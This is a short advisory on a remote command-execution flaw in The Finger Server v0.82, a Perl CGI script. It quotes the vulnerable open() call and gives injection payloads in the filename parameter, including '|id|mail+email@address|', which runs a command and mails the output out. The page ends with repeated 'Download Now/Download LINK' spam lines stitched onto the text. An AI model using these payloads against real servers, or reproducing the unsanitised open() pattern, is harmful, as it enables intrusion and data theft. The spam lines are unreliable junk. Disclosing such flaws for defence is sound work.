"The Finger Server" execute shell commands
Vulnerability
"The Finger Server"
Affected
"The Finger Server"
Description
Iain Wade found following. In 1999. he was tinkering w/ The Finger Server v0.82 and came across some bugs which let you execute shell commands under the privileges of the web server.It's available at
glazed.org It's just another case of perl doing it's magic on an open() call.There is undoubtably other problems, but here's the offending code exploited here is:
open (PLANS, "$plan_path$filename") ||
do { print "Can't open $plan_path$filename: $!";
return;
};
It is called with the following arguments;
finger.cgi?action=archives&cmd=specific&filename=99.10.28.15.23.username.plan It does minimal checking before there, really only making sure the username is valid, but for example by using:
finger.cgi?action=archives&cmd=specific&filename=99.10.28.15.23.username.|
you can execute whatever... The output will not get to you (the web client) obviously if you use |
however get executed... So an example to test it could be
|id|mail+email@address|
Surrounding it in pipes is the only way one could get it to execute, otherwise it would return open errors
"The Finger Server" Execute Shell Commands >>>>> Download Now
>>>>> Download Full
"The Finger Server" Execute Shell Commands >>>>> Download LINK
>>>>> Download Now
"The Finger Server" Execute Shell Commands >>>>> Download Full
>>>>> Download LINK eQ